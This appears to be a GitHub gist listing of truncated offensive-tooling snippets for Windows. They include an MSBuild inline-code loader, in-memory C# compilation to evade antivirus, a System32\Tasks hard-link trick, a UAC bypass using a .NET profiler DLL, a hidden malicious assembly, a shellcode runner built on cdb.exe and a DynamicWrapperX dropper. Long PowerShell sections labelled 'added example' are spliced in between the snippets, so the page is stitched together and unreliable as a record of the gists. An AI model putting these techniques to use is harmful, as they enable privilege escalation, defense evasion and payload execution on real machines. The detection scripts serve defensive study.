caseysmithrc
caseysmithrc / JankyAF.csproj
Created Jul 17, 2019 — forked from bohops/JankyAF.csproj
Fun loader for Casey Smith's (@subTee) JankyAF.xsl
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe JankyAF.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
caseysmithrc / CompileInMemory.cs
Created Jul 8, 2019 — forked from TheKevinWang/CompileInMemory.cs
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/ However, this still executes csc.exe and drops a DLL to %temp%: https://twitter.com/Laughing_Mantis/status/991018563296157696
using System;
using System.Collections.Generic;
using System.Text;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Reflection;
namespace InMemoryCompiler
{
class Program
caseysmithrc / Update_Notes.md
Last active Jul 22, 2019
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using a hard link to point back to an attacker-controlled location:

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This redirects the search to an arbitrary location and evades tools that only watch for file modifications (new or changed files) in a particular directory: the directory entry under Tasks is created, but the file content is written through the attacker's own path. Two constraints: a hard link can only be created within a single NTFS volume, and current Windows builds require write access to the link target, which holds here because the target is the attacker's own file.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html
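The hard-link trick above, and the audit a defender would run against it, as an added PowerShell example that is not part of the gist. The link path, the target C:\Tools\Tasks.dll and the file name tasks.dll are taken from the note; the choice to flag any entry in a Tasks directory whose other link names lie outside that directory (and any .dll or .exe sitting there at all, since Tasks normally holds only XML task definitions) is this example's own. fsutil hardlink list is assumed to be run from an elevated prompt.

```powershell
# Added example (not from the gist). Red-team side: the New-Item equivalent of
# "mklink /h". Blue-team side: enumerate hard-link names with fsutil and report
# Tasks entries that are really aliases of files elsewhere on the volume.

$taskDirs = @("$env:SystemRoot\System32\Tasks", "$env:SystemRoot\SysWOW64\Tasks")

function New-TasksHardLink {
    param(
        [string]$LinkPath = "$env:SystemRoot\System32\Tasks\tasks.dll",  # from the note
        [string]$Target   = 'C:\Tools\Tasks.dll'                           # attacker-owned file (assumed path)
    )
    # -ItemType HardLink is supported by New-Item in Windows PowerShell 5.1 and PowerShell 7
    New-Item -ItemType HardLink -Path $LinkPath -Value $Target | Out-Null
}

function Get-ForeignHardLinks {
    param([string]$Directory)

    Get-ChildItem -LiteralPath $Directory -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file  = $_
            $drive = $file.FullName.Substring(0, 2)   # e.g. "C:"; fsutil prints volume-relative names

            # fsutil hardlink list prints one link name per line, each starting with "\"
            $names = @(& fsutil.exe hardlink list $file.FullName 2>$null |
                       Where-Object { $_ -match '^\\' } |
                       ForEach-Object { $drive + $_ })

            $foreign = @($names | Where-Object {
                -not $_.StartsWith($Directory, [System.StringComparison]::OrdinalIgnoreCase)
            })

            # Executable content does not belong in a Tasks directory regardless of linking
            $badExtension = $file.Extension -in '.dll', '.exe'

            if ($foreign.Count -gt 0 -or $badExtension) {
                [pscustomobject]@{
                    TasksEntry = $file.FullName
                    LinkCount  = $names.Count
                    OtherNames = ($foreign -join '; ')
                    ExeContent = $badExtension
                }
            }
        }
}

# Usage: audit both directories (run elevated so fsutil can read every entry)
foreach ($dir in $taskDirs) {
    if (Test-Path -LiteralPath $dir) { Get-ForeignHardLinks -Directory $dir }
}
```

Because the link shares the target's data, inspecting the Tasks entry shows the current DLL bytes even though no write ever hit that path; that is why the audit keys on link names rather than on write timestamps in the directory.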

caseysmithrc / UserWritableLocations.ps1
Created Jul 4, 2019 — forked from hinchley/UserWritableLocations.ps1
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article: http://hinchley.net/2016/06/13/an-approach-for-managing-microsoft-applocker-policies/
# Paths that we've already excluded via AppLocker.
$exclusions = @()
# Paths to process.
$paths = @(
"C:\Windows"
)
# Setup log.
$log = "$PSScriptRoot\UserWritableLocations.log"
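A complete scanner for the same job, added here as an example and not hinchley's script: walk the roots, read each directory's DACL, and report directories where a principal every interactive user belongs to holds an Allow ACE that permits creating files or subdirectories. The principal list (Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE), the exclusion handling and the rights mask are this example's own choices.

```powershell
# Added example (not the gist's code): find directories under $Root that a
# low-privilege user can write into, skipping any path prefixes in $Exclude.

function ConvertTo-Sid {
    param([System.Security.Principal.IdentityReference]$Identity)
    # Translate names to SIDs so localized group names and orphaned SIDs compare the same way
    try { $Identity.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $null }
}

function Get-UserWritableDirectory {
    param(
        [string[]]$Root    = @("$env:SystemRoot"),
        [string[]]$Exclude = @()
    )

    $lowPrivSids = @(
        'S-1-1-0',       # Everyone
        'S-1-5-11',      # Authenticated Users
        'S-1-5-32-545',  # BUILTIN\Users
        'S-1-5-4'        # INTERACTIVE
    )
    # Either bit lets a user place new content into the directory; Write, Modify and
    # FullControl include both, so the mask catches them too.
    $writeMask = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                 [System.Security.AccessControl.FileSystemRights]::CreateDirectories

    Get-ChildItem -LiteralPath $Root -Directory -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object {
            $d = $_.FullName
            -not ($Exclude | Where-Object { $d -like "$_*" })
        } |
        ForEach-Object {
            $dir = $_
            try { $acl = Get-Acl -LiteralPath $dir.FullName } catch { return }

            $hits = @($acl.Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                (($_.FileSystemRights -band $writeMask) -ne 0) -and
                # An inherit-only ACE grants nothing on this directory itself
                ($_.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) -eq 0 -and
                (ConvertTo-Sid $_.IdentityReference) -in $lowPrivSids
            })

            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    Path       = $dir.FullName
                    Principals = (@($hits.IdentityReference.Value) | Sort-Object -Unique) -join ', '
                    Rights     = (@($hits.FileSystemRights) | Sort-Object -Unique) -join ', '
                }
            }
        }
}

# Usage: everything under C:\Windows, minus prefixes already handled elsewhere
Get-UserWritableDirectory -Root "$env:SystemRoot" -Exclude "$env:SystemRoot\Temp" |
    Format-Table -AutoSize
```

The scan reports Allow ACEs only; a matching Deny ACE for the same principal would still block the write, and ACEs expressed with generic rights show up as raw numbers in FileSystemRights and are not matched by the mask, so treat the output as candidates to confirm by actually creating a file as a test user.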
caseysmithrc / UAC-dotnet-profiler-poc.ps1
Created Jul 2, 2019 — forked from clavoillotte/UAC-dotnet-profiler-poc.ps1
PoC of UAC bypass with a .NET profiler DLL
# Bypass UAC with a .NET profiler DLL
# GUID, path and content
$GUID = '{' + [guid]::NewGuid() + '}'
$DllPath = $env:TEMP + "\test.dll"
$DllBytes64 = "..."  # base64-encoded 64-bit profiler DLL (not included here)
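A check for the registration side of a profiler-based bypass, added as an example and not part of the PoC. The variable names (COR_ENABLE_PROFILING, COR_PROFILER, COR_PROFILER_PATH and their 32/64 and CoreCLR variants) are the CLR's documented profiling hooks; that this PoC registers its DLL through the per-user Environment key, and the list of "suspicious" parent directories, are assumptions of the example.

```powershell
# Added example (not the gist's code): report CLR profiler registration in the
# user and machine Environment keys, flag profiler DLLs living in temporary or
# per-user locations, and resolve a COR_PROFILER CLSID registered under the
# user-writable HKCU\Software\Classes hive.

function Get-ClrProfilerRegistration {
    $keys = @(
        'HKCU:\Environment',
        'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
    )
    $vars = @(
        'COR_ENABLE_PROFILING', 'COR_PROFILER', 'COR_PROFILER_PATH',
        'COR_PROFILER_PATH_32', 'COR_PROFILER_PATH_64',
        'CORECLR_ENABLE_PROFILING', 'CORECLR_PROFILER', 'CORECLR_PROFILER_PATH',
        'CORECLR_PROFILER_PATH_32', 'CORECLR_PROFILER_PATH_64'
    )
    # Directories a legitimate profiler is not expected to load from (example's choice)
    $userLocations = @($env:TEMP, $env:USERPROFILE, $env:ProgramData) | Where-Object { $_ }

    foreach ($key in $keys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $item = Get-Item -LiteralPath $key

        foreach ($name in $item.GetValueNames()) {
            if ($vars -notcontains $name) { continue }
            $value      = [string]$item.GetValue($name)
            $resolved   = $null
            $suspicious = $false

            if ($name -like '*PROFILER_PATH*') {
                $resolved = [Environment]::ExpandEnvironmentVariables($value)
            }
            elseif ($name -eq 'COR_PROFILER' -or $name -eq 'CORECLR_PROFILER') {
                # Without an explicit path the .NET Framework locates the profiler by CLSID;
                # a CLSID under HKCU\Software\Classes needs no admin rights to create.
                $clsidKey = "HKCU:\Software\Classes\CLSID\$value\InprocServer32"
                if (Test-Path -LiteralPath $clsidKey) {
                    $resolved = (Get-ItemProperty -LiteralPath $clsidKey -ErrorAction SilentlyContinue).'(default)'
                    $suspicious = $true   # per-user COM registration of a profiler is itself notable
                }
            }

            if ($resolved) {
                foreach ($loc in $userLocations) {
                    if ($resolved.StartsWith($loc, [System.StringComparison]::OrdinalIgnoreCase)) { $suspicious = $true }
                }
            }

            [pscustomobject]@{
                Key        = $key
                Name       = $name
                Value      = $value
                Resolved   = $resolved
                Suspicious = $suspicious
            }
        }
    }
}

# Usage: any output at all on a workstation deserves a look; Suspicious = True more so
Get-ClrProfilerRegistration | Format-Table -AutoSize
```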
caseysmithrc / malicious.cs
Created Jun 15, 2019 — forked from Arno0x/malicious.cs
Hide a malicious assembly in another one with runtime code compilation
/*
Author: Arno0x0x, Twitter: @Arno0x0x
DO NOT COMPILE THIS SOURCE FILE !
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
caseysmithrc / win_vm_kerneldbg.md
Created Jun 7, 2019 — forked from cji/win_vm_kerneldbg.md
Steps to successfully debug the Windows kernel between 2 VMware VMs

Open the debugger VM's .vmx file, delete the existing serial0 lines (used for printing, not needed) and add these lines:

serial0.present = "TRUE"
serial0.pipe.endPoint = "client"
serial0.fileType = "pipe"
serial0.yieldOnMsrRead = "TRUE"
serial0.tryNoRxLoss = "FALSE"
serial0.startConnected = "TRUE"
caseysmithrc / sc-cdb.py
Created Jun 7, 2019 — forked from 3xocyte/sc-cdb.py
shellcode to cdb.exe
#!/usr/bin/env python
# run: cdb.exe -cf output.wds -o calc.exe
# From: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
# Read the raw shellcode in binary mode so Windows does not translate newlines
with open('shellcode', 'rb') as src:
    sc = src.read()
# Each byte is written into the allocated buffer with "eb @$t0+<offset> <byte>"
copy = ";eb @$t0+"
caseysmithrc / dynwrapx.js
Created Jun 2, 2019
DynamicWrapperX Dropper - Code Registration Example
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
var fso = new ActiveXObject("Scripting.FileSystemObject");
var dropPath = fso.GetSpecialFolder(2); // 2 = TemporaryFolder (%TEMP%)
// Create Base64 Object, supports encode, decode
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac